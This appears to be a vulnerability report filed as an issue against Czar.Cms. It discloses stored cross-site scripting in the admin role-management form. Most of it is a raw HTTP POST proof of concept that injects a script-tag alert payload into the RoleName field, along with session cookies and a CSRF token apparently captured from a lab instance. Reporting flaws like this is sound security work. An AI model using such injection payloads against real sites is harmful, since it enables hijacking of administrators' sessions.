Czar.Cms icon indicating copy to clipboard operation
Czar.Cms copied to clipboard

Published 20 hours ago verified publisher icon yilezhu

Background system management - role management - add role exists to store xss

Open nolan124 opened this issue 2 years ago • 0 comments

Background system management - role management - add role exists to store xss poc `POST /ManagerRole/AddOrModify/ HTTP/1.1 Host: 192.168.3.129:10027 Content-Length: 104 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuUKggdyrAoglgr7LfZ8iZF6VXbq83ppywrX0JPxJKlsl38ZSolXbCtNgHFMDRmaIsmteJSI2HvS12KQdyiSAFMuXdOQkK99P3dsYApj_QgBcuuLJgzpxJ0o0k_6NN98sRcZWc53HCrY_PLh7l1TFRoqlvNIgZvWNh6VlpP9HwqUCg Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:10027 Referer: http://192.168.3.129:10027/ManagerRole/AddOrModify/12 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuUXDugwcSZuancZF9JPGvyf5oI3aHW2sXqa2qVVdX-NFDejFfWv37wGTvud7o7-ZZDPDfbikqNt4bjYY3oqWIgZXWjKGNcUKVJzWJHHvYcYlfIWyOYFdFrXKyz00DG9cnm8-j-O8RVUanynvgy2A31_j8l0H3I57YVfcoMxN4WkVFHfrF7qzJJX6HrfQR3xnnZrmj8eRn0X3XzqykBzyfGxT86CC0359MGt-2lx8PrJOEdB3c0yBUS_aVn0aYJpyOqhA7I8guqEfn9H65N5vbkLNfMC66aaJZbWh2SFK_lQe7r4CrjHesVsBmge-79afQqb2P-4QLb0ASVV7qznTxOOg2Avs2f-2dGmnNjP_68SGmaC58YqQ0RJYGZIX-CX4UvFnKMWd9p1XXxrDh5IcGhIDzNGaaFw3_wjBDL4KFCnkcQcQTuFCtklEapV70w4H71JQsNEEOLHFtFuNwp460l1qpRaWDyjTR6swMsLJQPiKrtmk83Tx6dRXQweXgqQCbpO8QcKcKhCK5dDB-53qEDz Connection: close

Id=12&RoleName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&RoleType=2&IsSystem=false&Remark=%E7%BC%96%E8%BE%9110` image

then you can view in background xss image

nolan124 avatar Jan 08 '23 05:01 nolan124